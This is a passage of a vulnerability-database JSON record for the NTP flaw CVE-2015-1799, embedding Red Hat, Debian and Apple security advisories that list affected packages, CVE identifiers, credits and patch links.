7):\n\naarch64:\nntp-debuginfo-4.2.6p5-22.el7.aarch64.rpm\nsntp-4.2.6p5-22.el7.aarch64.rpm\n\nnoarch:\nntp-doc-4.2.6p5-22.el7.noarch.rpm\nntp-perl-4.2.6p5-22.el7.noarch.rpm\n\nppc64:\nntp-debuginfo-4.2.6p5-22.el7.ppc64.rpm\nsntp-4.2.6p5-22.el7.ppc64.rpm\n\nppc64le:\nntp-debuginfo-4.2.6p5-22.el7.ppc64le.rpm\nsntp-4.2.6p5-22.el7.ppc64le.rpm\n\ns390x:\nntp-debuginfo-4.2.6p5-22.el7.s390x.rpm\nsntp-4.2.6p5-22.el7.s390x.rpm\n\nx86_64:\nntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm\nsntp-4.2.6p5-22.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nntp-4.2.6p5-22.el7.src.rpm\n\nx86_64:\nntp-4.2.6p5-22.el7.x86_64.rpm\nntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm\nntpdate-4.2.6p5-22.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nnoarch:\nntp-doc-4.2.6p5-22.el7.noarch.rpm\nntp-perl-4.2.6p5-22.el7.noarch.rpm\n\nx86_64:\nntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm\nsntp-4.2.6p5-22.el7.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2014-9297\nhttps://access.redhat.com/security/cve/CVE-2014-9298\nhttps://access.redhat.com/security/cve/CVE-2014-9750\nhttps://access.redhat.com/security/cve/CVE-2014-9751\nhttps://access.redhat.com/security/cve/CVE-2015-1798\nhttps://access.redhat.com/security/cve/CVE-2015-1799\nhttps://access.redhat.com/security/cve/CVE-2015-3405\nhttps://access.redhat.com/security/updates/classification/#moderate\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2015 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD4DBQFWTkFJXlSAg2UNWIIRAphzAKCRHDVdHI5OvJ8glkXYLBwyQgeyvwCYmTV3\n1hLTu5I/PUzWOnD8rRIlZQ==\n=sWdG\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce. This could allow a remote\n attacker to cause a denial of service by impeding synchronization\n between NTP peers. \n\nAdditionally, it was discovered that generating MD5 keys using ntp-keygen\non big endian machines would either trigger an endless loop, or generate\nnon-random keys. \n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 1:4.2.6.p5+dfsg-2+deb7u4. \n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1:4.2.6.p5+dfsg-7. \n\nWe recommend that you upgrade your ntp packages. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\nAPPLE-SA-2015-06-30-2 OS X Yosemite v10.10.4 and Security Update\n2015-005\n\nOS X Yosemite v10.10.4 and Security Update 2015-005 are now available\nand address the following:\n\nAdmin Framework\nAvailable for: OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: A process may gain admin privileges without proper\nauthentication\nDescription: An issue existed when checking XPC entitlements. This\nissue was addressed through improved entitlement checking. \nCVE-ID\nCVE-2015-3671 : Emil Kvarnhammar at TrueSec\n\nAdmin Framework\nAvailable for: OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: A non-admin user may obtain admin rights\nDescription: An issue existed in the handling of user\nauthentication. This issue was addressed through improved error\nchecking. \nCVE-ID\nCVE-2015-3672 : Emil Kvarnhammar at TrueSec\n\nAdmin Framework\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: An attacker may abuse Directory Utility to gain root\nprivileges\nDescription: Directory Utility was able to be moved and modified to\nachieve code execution within an entitled process. This issue was\naddressed by limiting the disk location that writeconfig clients may\nbe executed from. \nCVE-ID\nCVE-2015-3673 : Patrick Wardle of Synack, Emil Kvarnhammar at TrueSec\n\nafpserver\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: A remote attacker may be able to cause unexpected\napplication termination or arbitrary code execution\nDescription: A memory corruption issue existed in the AFP server. \nThis issue was addressed through improved memory handling. \nCVE-ID\nCVE-2015-3674 : Dean Jerkovich of NCC Group\n\napache\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: An attacker may be able to access directories that are\nprotected with HTTP authentication without knowing the correct\ncredentials\nDescription: The default Apache configuration did not include\nmod_hfs_apple. If Apache was manually enabled and the configuration\nwas not changed, some files that should not be accessible might have\nbeen accessible using a specially crafted URL. This issue was\naddressed by enabling mod_hfs_apple. \nCVE-ID\nCVE-2015-3675 : Apple\n\napache\nAvailable for: OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: Multiple vulnerabilities exist in PHP, the most serious of\nwhich may lead to arbitrary code execution\nDescription: Multiple vulnerabilities existed in PHP versions prior\nto 5.5.24 and 5.4.40. These were addressed by updating PHP to\nversions 5.5.24 and 5.4.40. \nCVE-ID\nCVE-2015-0235\nCVE-2015-0273\n\nAppleGraphicsControl\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: A malicious application may be able to determine kernel\nmemory layout\nDescription: An issue existed in AppleGraphicsControl which could\nhave led to the disclosure of kernel memory layout. This issue was\naddressed through improved bounds checking. \nCVE-ID\nCVE-2015-3676 : Chen Liang of KEEN Team\n\nAppleFSCompression\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: A malicious application may be able to determine kernel\nmemory layout\nDescription: An issue existed in LZVN compression that could have\nled to the disclosure of kernel memory content. This issue was\naddressed through improved memory handling. \nCVE-ID\nCVE-2015-3677 : an anonymous researcher working with HP\u0027s Zero Day\nInitiative\n\nAppleThunderboltEDMService\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: A malicious application may be able to execute arbitrary\ncode with system privileges\nDescription: A memory corruption issue existed in the handling of\ncertain Thunderbolt commands from local processes. This issue was\naddressed through improved memory handling. \nCVE-ID\nCVE-2015-3678 : Apple\n\nATS\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: Processing a maliciously crafted font file may lead to an\nunexpected application termination or arbitrary code execution\nDescription: Multiple memory corruption issues existed in handling\nof certain fonts. These issues were addressed through improved memory\nhandling. \nCVE-ID\nCVE-2015-3679 : Pawel Wylecial working with HP\u0027s Zero Day Initiative\nCVE-2015-3680 : Pawel Wylecial working with HP\u0027s Zero Day Initiative\nCVE-2015-3681 : John Villamil (@day6reak), Yahoo Pentest Team\nCVE-2015-3682 : Nuode Wei\n\nBluetooth\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: A malicious application may be able to execute arbitrary\ncode with system privileges\nDescription: A memory corruption issue existed in the Bluetooth HCI\ninterface. This issue was addressed through improved memory handling. \nCVE-ID\nCVE-2015-3683 : Roberto Paleari and Aristide Fattori of Emaze\nNetworks\n\nCertificate Trust Policy\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: An attacker with a privileged network position may be able\nto intercept network traffic\nDescription: An intermediate certificate was incorrectly issued by\nthe certificate authority CNNIC. This issue was addressed through the\naddition of a mechanism to trust only a subset of certificates issued\nprior to the mis-issuance of the intermediate. Further details are\navailable at https://support.apple.com/en-us/HT204938\n\nCertificate Trust Policy\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nDescription: The certificate trust policy was updated. The complete\nlist of certificates may be viewed at https://support.apple.com/en-\nus/HT202858. \n\nCFNetwork HTTPAuthentication\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: Following a maliciously crafted URL may lead to arbitrary\ncode execution\nDescription: A memory corruption issue existed in handling of\ncertain URL credentials. This issue was addressed through improved\nmemory handling. \nCVE-ID\nCVE-2015-3684 : Apple\n\nCoreText\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: Processing a maliciously crafted text file may lead to an\nunexpected application termination or arbitrary code execution\nDescription: Multiple memory corruption issues existed in the\nprocessing of text files. These issues were addressed through\nimproved bounds checking. \nCVE-ID\nCVE-2015-1157\nCVE-2015-3685 : Apple\nCVE-2015-3686 : John Villamil (@day6reak), Yahoo Pentest Team\nCVE-2015-3687 : John Villamil (@day6reak), Yahoo Pentest Team\nCVE-2015-3688 : John Villamil (@day6reak), Yahoo Pentest Team\nCVE-2015-3689 : Apple\n\ncoreTLS\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: An attacker with a privileged network position may intercept\nSSL/TLS connections\nDescription: coreTLS accepted short ephemeral Diffie-Hellman (DH)\nkeys, as used in export-strength ephemeral DH cipher suites. This\nissue, also known as Logjam, allowed an attacker with a privileged\nnetwork position to downgrade security to 512-bit DH if the server\nsupported an export-strength ephemeral DH cipher suite. The issue was\naddressed by increasing the default minimum size allowed for DH\nephemeral keys to 768 bits. \nCVE-ID\nCVE-2015-4000 : The weakdh team at weakdh.org, Hanno Boeck\n\nDiskImages\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: A malicious application may be able to determine kernel\nmemory layout\nDescription: An information disclosure issue existed in the\nprocessing of disk images. This issue was addressed through improved\nmemory management. \nCVE-ID\nCVE-2015-3690 : Peter Rutenbar working with HP\u0027s Zero Day Initiative\n\nDisplay Drivers\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: A malicious application may be able to execute arbitrary\ncode with system privileges\nDescription: An issue existed in the Monitor Control Command Set\nkernel extension by which a userland process could control the value\nof a function pointer within the kernel. The issue was addressed by\nremoving the affected interface. \nCVE-ID\nCVE-2015-3691 : Roberto Paleari and Aristide Fattori of Emaze\nNetworks\n\nEFI\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: A malicious application with root privileges may be able to\nmodify EFI flash memory\nDescription: An insufficient locking issue existed with EFI flash\nwhen resuming from sleep states. This issue was addressed through\nimproved locking. \nCVE-ID\nCVE-2015-3692 : Trammell Hudson of Two Sigma Investments, Xeno Kovah\nand Corey Kallenberg of LegbaCore LLC, Pedro Vilaca\n\nEFI\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: A malicious application may induce memory corruption to\nescalate privileges\nDescription: A disturbance error, also known as Rowhammer, exists\nwith some DDR3 RAM that could have led to memory corruption. This\nissue was mitigated by increasing memory refresh rates. \nCVE-ID\nCVE-2015-3693 : Mark Seaborn and Thomas Dullien of Google, working\nfrom original research by Yoongu Kim et al (2014)\n\nFontParser\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: Processing a maliciously crafted font file may lead to an\nunexpected application termination or arbitrary code execution\nDescription: A memory corruption issue existed in the processing of\nfont files. This issue was addressed through improved input\nvalidation. \nCVE-ID\nCVE-2015-3694 : John Villamil (@day6reak), Yahoo Pentest Team\n\nGraphics Driver\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: A malicious application may be able to execute arbitrary\ncode with system privileges\nDescription: An out of bounds write issue existed in NVIDIA graphics\ndriver. This issue was addressed through improved bounds checking. \nCVE-ID\nCVE-2015-3712 : Ian Beer of Google Project Zero\n\nIntel Graphics Driver\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: Multiple buffer overflow issues exist in the Intel graphics\ndriver, the most serious of which may lead to arbitrary code\nexecution with system privileges\nDescription: Multiple buffer overflow issues existed in the Intel\ngraphics driver. These were addressed through additional bounds\nchecks. \nCVE-ID\nCVE-2015-3695 : Ian Beer of Google Project Zero\nCVE-2015-3696 : Ian Beer of Google Project Zero\nCVE-2015-3697 : Ian Beer of Google Project Zero\nCVE-2015-3698 : Ian Beer of Google Project Zero\nCVE-2015-3699 : Ian Beer of Google Project Zero\nCVE-2015-3700 : Ian Beer of Google Project Zero\nCVE-2015-3701 : Ian Beer of Google Project Zero\nCVE-2015-3702 : KEEN Team\n\nImageIO\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: Multiple vulnerabilities existed in libtiff, the most\nserious of which may lead to arbitrary code execution\nDescription: Multiple vulnerabilities existed in libtiff versions\nprior to 4.0.4. They were addressed by updating libtiff to version\n4.0.4. \nCVE-ID\nCVE-2014-8127\nCVE-2014-8128\nCVE-2014-8129\nCVE-2014-8130\n\nImageIO\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: Processing a maliciously crafted .tiff file may lead to an\nunexpected application termination or arbitrary code execution\nDescription: A memory corruption issue existed in the processing of\n.tiff files. This issue was addressed through improved bounds\nchecking. \nCVE-ID\nCVE-2015-3703 : Apple\n\nInstall Framework Legacy\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: A malicious application may be able to execute arbitrary\ncode with system privileges\nDescription: Several issues existed in how Install.framework\u0027s\n\u0027runner\u0027 setuid binary dropped privileges. This was addressed by\nproperly dropping privileges. \nCVE-ID\nCVE-2015-3704 : Ian Beer of Google Project Zero\n\nIOAcceleratorFamily\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: A malicious application may be able to execute arbitrary\ncode with system privileges\nDescription: Multiple memory corruption issues existed in\nIOAcceleratorFamily. These issues were addressed through improved\nmemory handling. \nCVE-ID\nCVE-2015-3705 : KEEN Team\nCVE-2015-3706 : KEEN Team\n\nIOFireWireFamily\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: A malicious application may be able to execute arbitrary\ncode with system privileges\nDescription: Multiple null pointer dereference issues existed in the\nFireWire driver. These issues were addressed through improved error\nchecking. \nCVE-ID\nCVE-2015-3707 : Roberto Paleari and Aristide Fattori of Emaze\nNetworks\n\nKernel\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: A malicious application may be able to determine kernel\nmemory layout\nDescription: A memory management issue existed in the handling of\nAPIs related to kernel extensions which could have led to the\ndisclosure of kernel memory layout. This issue was addressed through\nimproved memory management. \nCVE-ID\nCVE-2015-3720 : Stefan Esser\n\nKernel\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: A malicious application may be able to determine kernel\nmemory layout\nDescription: A memory management issue existed in the handling of\nHFS parameters which could have led to the disclosure of kernel\nmemory layout. This issue was addressed through improved memory\nmanagement. \nCVE-ID\nCVE-2015-3721 : Ian Beer of Google Project Zero\n\nkext tools\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: A malicious application may be able to overwrite arbitrary\nfiles\nDescription: kextd followed symbolic links while creating a new\nfile. This issue was addressed through improved handling of symbolic\nlinks. \nCVE-ID\nCVE-2015-3708 : Ian Beer of Google Project Zero\n\nkext tools\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: A local user may be able to load unsigned kernel extensions\nDescription: A time-of-check time-of-use (TOCTOU) race condition\ncondition existed while validating the paths of kernel extensions. \nThis issue was addressed through improved checks to validate the path\nof the kernel extensions. \nCVE-ID\nCVE-2015-3709 : Ian Beer of Google Project Zero\n\nMail\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: A maliciously crafted email can replace the message content\nwith an arbitrary webpage when the message is viewed\nDescription: An issue existed in the support for HTML email which\nallowed message content to be refreshed with an arbitrary webpage. \nThe issue was addressed through restricted support for HTML content. \nCVE-ID\nCVE-2015-3710 : Aaron Sigel of vtty.com, Jan Soucek\n\nntfs\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: A malicious application may be able to determine kernel\nmemory layout\nDescription: An issue existed in NTFS that could have led to the\ndisclosure of kernel memory content. This issue was addressed through\nimproved memory handling. \nCVE-ID\nCVE-2015-3711 : Peter Rutenbar working with HP\u0027s Zero Day Initiative\n\nntp\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: An attacker in a privileged position may be able to perform\na denial of service attack against two ntp clients\nDescription: Multiple issues existed in the authentication of ntp\npackets being received by configured end-points. These issues were\naddressed through improved connection state management. \nCVE-ID\nCVE-2015-1798\nCVE-2015-1799\n\nOpenSSL\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: Multiple issues exist in OpenSSL, including one that may\nallow an attacker to intercept connections to a server that supports\nexport-grade ciphers\nDescription: Multiple issues existed in OpenSSL 0.9.8zd which were\naddressed by updating OpenSSL to version 0.9.8zf. \nCVE-ID\nCVE-2015-0209\nCVE-2015-0286\nCVE-2015-0287\nCVE-2015-0288\nCVE-2015-0289\nCVE-2015-0293\n\nQuickTime\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: Processing a maliciously crafted movie file may lead to an\nunexpected application termination or arbitrary code execution\nDescription: Multiple memory corruption issues existed in QuickTime. \nThese issues were addressed through improved memory handling. \nCVE-ID\nCVE-2015-3661 : G. Geshev working with HP\u0027s Zero Day Initiative\nCVE-2015-3662 : kdot working with HP\u0027s Zero Day Initiative\nCVE-2015-3663 : kdot working with HP\u0027s Zero Day Initiative\nCVE-2015-3666 : Steven Seeley of Source Incite working with HP\u0027s Zero\nDay Initiative\nCVE-2015-3667 : Ryan Pentney, Richard Johnson of Cisco Talos and Kai\nLu of Fortinet\u0027s FortiGuard Labs, Ryan Pentney, and Richard Johnson\nof Cisco Talos and Kai Lu of Fortinet\u0027s FortiGuard Labs\nCVE-2015-3668 : Kai Lu of Fortinet\u0027s FortiGuard Labs\nCVE-2015-3713 : Apple\n\nSecurity\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: A remote attacker may cause an unexpected application\ntermination or arbitrary code execution\nDescription: An integer overflow existed in the Security framework\ncode for parsing S/MIME e-mail and some other signed or encrypted\nobjects. This issue was addressed through improved validity checking. \nCVE-ID\nCVE-2013-1741\n\nSecurity\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: Tampered applications may not be prevented from launching\nDescription: Apps using custom resource rules may have been\nsusceptible to tampering that would not have invalidated the\nsignature. This issue was addressed with improved resource\nvalidation. \nCVE-ID\nCVE-2015-3714 : Joshua Pitts of Leviathan Security Group\n\nSecurity\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: A malicious application may be able to bypass code signing\nchecks\nDescription: An issue existed where code signing did not verify\nlibraries loaded outside the application bundle. This issue was\naddressed with improved bundle verification. \nCVE-ID\nCVE-2015-3715 : Patrick Wardle of Synack\n\nSpotlight\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: Searching for a malicious file with Spotlight may lead to\ncommand injection\nDescription: A command injection vulnerability existed in the\nhandling of filenames of photos added to the local photo library. \nThis issue was addressed through improved input validation. \nCVE-ID\nCVE-2015-3716 : Apple\n\nSQLite\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: A remote attacker may cause an unexpected application\ntermination or arbitrary code execution\nDescription: Multiple buffer overflows existed in SQLite\u0027s printf\nimplementation. These issues were addressed through improved bounds\nchecking. \nCVE-ID\nCVE-2015-3717 : Peter Rutenbar working with HP\u0027s Zero Day Initiative\n\nSystem Stats\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: A malicious app may be able to compromise systemstatsd\nDescription: A type confusion issue existed in systemstatsd\u0027s\nhandling of interprocess communication. By sending a maliciously\nformatted message to systemstatsd, it may have been possible to\nexecute arbitrary code as the systemstatsd process. The issue was\naddressed through additional type checking. \nCVE-ID\nCVE-2015-3718 : Roberto Paleari and Aristide Fattori of Emaze\nNetworks\n\nTrueTypeScaler\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: Processing a maliciously crafted font file may lead to an\nunexpected application termination or arbitrary code execution\nDescription: A memory corruption issue existed in the processing of\nfont files. This issue was addressed through improved input\nvalidation. \nCVE-ID\nCVE-2015-3719 : John Villamil (@day6reak), Yahoo Pentest Team\n\nzip\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: Extracting a maliciously crafted zip file using the unzip\ntool may lead to an unexpected application termination or arbitrary\ncode execution\nDescription: Multiple memory corruption issues existed in the\nhandling of zip files. These issues were addressed through improved\nmemory handling. \nCVE-ID\n\nCVE-2014-8139\nCVE-2014-8140\nCVE-2014-8141\n\n\nOS X Yosemite 10.10.4 includes the security content of Safari 8.0.7. \nhttps://support.apple.com/en-us/HT204950\n\nOS X Yosemite 10.10.4 and Security Update 2015-005 may be obtained\nfrom the Mac App Store or Apple\u0027s Software Downloads web site:\nhttp://www.apple.com/support/downloads/\n\nInformation will also be posted to the Apple Security Updates\nweb site: http://support.apple.com/kb/HT1222\n\nThis message is signed with Apple\u0027s Product Security PGP key,\nand details are available at:\nhttps://www.apple.com/support/security/pgp/\n\n\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG/MacGPG2 v2\nComment: GPGTools - http://gpgtools.org\n\niQIcBAEBCAAGBQJVksFmAAoJEBcWfLTuOo7tV1AQAIYpkOMpHp181b+70sgyZ/Ue\nmFM527FFGDfLLuIW6LTcBsEFe9cfZxumB8eOFPirTNRK7krsVMo1W+faHXyWOnx7\nkbWylHdhaoxnX+A6Gj0vP71V6TNNsTi9+2dmdmHUnwxZ7Ws5QCNKebumUG3MMXXo\nEKxE5SNSNKyMSSYmliS26cdl8fWrmg9qTxiZQnxjOCrg/CNAolgVIRRfdMUL7i4w\naGAyrlJXOxFOuNkqdHX2luccuHFV7aW/dIXQ4MyjiRNl/bWrBQmQlneLLpPdFZlH\ncMfGa2/baaNaCbU/GqhNKbO4fKYVaqQWzfUrtqX0+bRv2wmOq33ARy9KE23bYTvL\nU4E9x9z87LsLXGAdjUi6MDe5g87DcmwIEigfF6/EHbDYa/2VvSdIa74XRv/JCN1+\naftHLotin76h4qV/dCAPf5J/Fr/1KFCM0IphhG7p+7fVTfyy7YDXNBiKCEZzLf8U\nTUWLUCgQhobtakqwzQJ5qyF8u63xzVXj8oeTOw6iiY/BLlj9def5LMm/z6ZKGTyC\n3c4+Sy5XvBHZoeiwdcndTVpnFbmmjZRdeqtdW/zX5mHnxXPa3lZiGoBDhHQgIg6J\n1tTVtnO1JSLXVYDR6Evx1EH10Vgkt2wAGTLjljSLwtckoEqc78qMAT1G5U4nFffI\n+gGm5FbAxjxElgA/gbaq\n=KLda\n-----END PGP SIGNATURE-----\n", "sources": [ { "db": "NVD", "id": "CVE-2015-1799" }, { "db": "CERT/CC", "id": "VU#374268" }, { "db": "JVNDB", "id": "JVNDB-2015-002116" }, { "db": "BID", "id": "73950" }, { "db": "VULMON", "id": "CVE-2015-1799" }, { "db": "PACKETSTORM", "id": "131582" }, { "db": "PACKETSTORM", "id": "131941" }, { "db": "PACKETSTORM", "id": "136119" }, { "db": "PACKETSTORM", "id": "131385" }, { "db": "PACKETSTORM", "id": "131405" }, { "db": "PACKETSTORM", "id": "134448" }, { "db": "PACKETSTORM", "id": "131396" }, { "db": "PACKETSTORM", "id": "132518" } ], "trust": 3.42 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "CERT/CC", "id": "VU#374268", "trust": 3.0 }, { "db": "NVD", "id": "CVE-2015-1799", "trust": 3.0 }, { "db": "BID", "id": "73950", "trust": 1.4 }, { "db": "SECTRACK", "id": "1032031", "trust": 1.1 }, { "db": "MCAFEE", "id": "SB10114", "trust": 1.1 }, { "db": "JVN", "id": "JVNVU95993136", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2015-002116", "trust": 0.8 }, { "db": "ICS CERT", "id": "ICSA-17-094-04", "trust": 0.4 }, { "db": "VULMON", "id": "CVE-2015-1799", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "131582", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "131941", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "136119", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "131385", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "131405", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "134448", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "131396", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "132518", "trust": 0.1 } ], "sources": [ { "db": "CERT/CC", "id": "VU#374268" }, { "db": "VULMON", "id": "CVE-2015-1799" }, { "db": "BID", "id": "73950" }, { "db": "JVNDB", "id": "JVNDB-2015-002116" }, { "db": "PACKETSTORM", "id": "131582" }, { "db": "PACKETSTORM", "id": "131941" }, { "db": "PACKETSTORM", "id": "136119" }, { "db": "PACKETSTORM", "id": "131385" }, { "db": "PACKETSTORM", "id": "131405" }, { "db": "PACKETSTORM", "id": "134448" }, { "db": "PACKETSTORM", "id": "131396" }, { "db": "PACKETSTORM", "id": "132518" }, { "db": "NVD", "id": "CVE-2015-1799" } ] }, "id": "VAR-201504-0362", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.478814715 }, "last_update_date": "2024-07-23T20:18:07.348000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "APPLE-SA-2015-06-30-2 OS X Yosemite v10.10.4 and Security Update 2015-005", "trust": 0.8, "url": "http://lists.apple.com/archives/security-announce/2015/jun/msg00002.html" }, { "title": "HT204942", "trust": 0.8, "url": "https://support.apple.com/en-us/ht204942" }, { "title": "HT204942", "trust": 0.8, "url": "https://support.apple.com/ja-jp/ht204942" }, { "title": "cisco-sa-20150408-ntpd", "trust": 0.8, "url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20150408-ntpd" }, { "title": "Bug 2781", "trust": 0.8, "url": "http://bugs.ntp.org/show_bug.cgi?id=2781" }, { "title": "Oracle Solaris Third Party Bulletin - April 2015", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/bulletinapr2015-2511959.html" }, { "title": "Recent Vulnerabilities", "trust": 0.8, "url": "http://support.ntp.org/bin/view/main/securitynotice#recent_vulnerabilities" }, { "title": "38275", "trust": 0.8, "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=38275" }, { "title": "cisco-sa-20150408-ntpd", "trust": 0.8, "url": "http://www.cisco.com/cisco/web/support/jp/112/1128/1128965_cisco-sa-20150408-ntpd-j.html" }, { "title": "Red Hat: Moderate: ntp security, bug fix, and enhancement update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20152231 - security advisory" }, { "title": "Ubuntu Security Notice: ntp vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2567-1" }, { "title": "Debian CVElist Bug Report Logs: ntp: CVE-2015-1798 CVE-2015-1799", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=d133e5923f2516253cdb12d9d3c37c05" }, { "title": "Red Hat: CVE-2015-1799", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2015-1799" }, { "title": "Debian Security Advisories: DSA-3223-1 ntp -- security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=d552cdc6350071420c8916bcaed96264" }, { "title": "Amazon Linux AMI: ALAS-2015-520", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2015-520" }, { "title": "Cisco: Multiple Vulnerabilities in ntpd (April 2015) Affecting Cisco Products", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-20150408-ntpd" }, { "title": "Apple: OS X Yosemite v10.10.4 and Security Update 2015-005", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=apple_security_advisories\u0026qid=50398602701d671602946005c7864211" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - April 2015", "trust": 0.1, "url": 